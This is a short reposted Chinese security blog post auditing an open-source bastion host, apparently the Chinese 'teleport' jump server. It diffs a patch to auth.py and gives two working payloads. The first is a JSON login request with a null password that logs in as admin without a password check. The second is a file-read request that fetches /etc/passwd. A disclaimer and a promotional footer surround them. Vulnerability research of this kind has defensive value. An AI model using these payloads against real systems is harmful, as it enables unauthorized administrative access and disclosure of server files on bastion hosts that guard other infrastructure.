开源堡垒机teleport任意用户登录漏洞审计
2023-4-15 16:12:9 Author: mp.weixin.qq.com(查看原文) 阅读量:7 收藏

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
0X00 任意用户登录分析

拿到更新包进行对比首先更新包更新了两个文件

对比auth.py

两个地方。一个是elif 改成了if 然后是检测了密码是否存在。那么跟进去代码看看login 的逻辑只要password 为None 那么就可以跳过密码验证。让password 为None 就直接用 json.dumpspyaload 如下:

{
"type":2,
"username":"admin",
"password":null,
"captcha":"rhcl",
"oath":"",
"remember":false
}

0X01 任意文件读取

payload如下:

/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0

作者:print("")

原文地址:https://www.o2oxy.cn/4132.html

关 注 有 礼

关注本公众号回复“718619
可以免费领取全套网络安全学习教程,安全靶场、面试指南、安全沙龙PPT、代码安全、火眼安全系统等

 还在等什么?赶紧点击下方名片关注学习吧!


文章来源: https://mp.weixin.qq.com/s?__biz=MzkwMTE4NDM5NA==&mid=2247486277&idx=1&sn=dbc764a89e6e4ade9b83d2f2f0566b93&chksm=c0b9e5a0f7ce6cb6cc6a8febaa5ba44c9094bf8624805db54e3cdbc454786b26e29fa787bb08&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh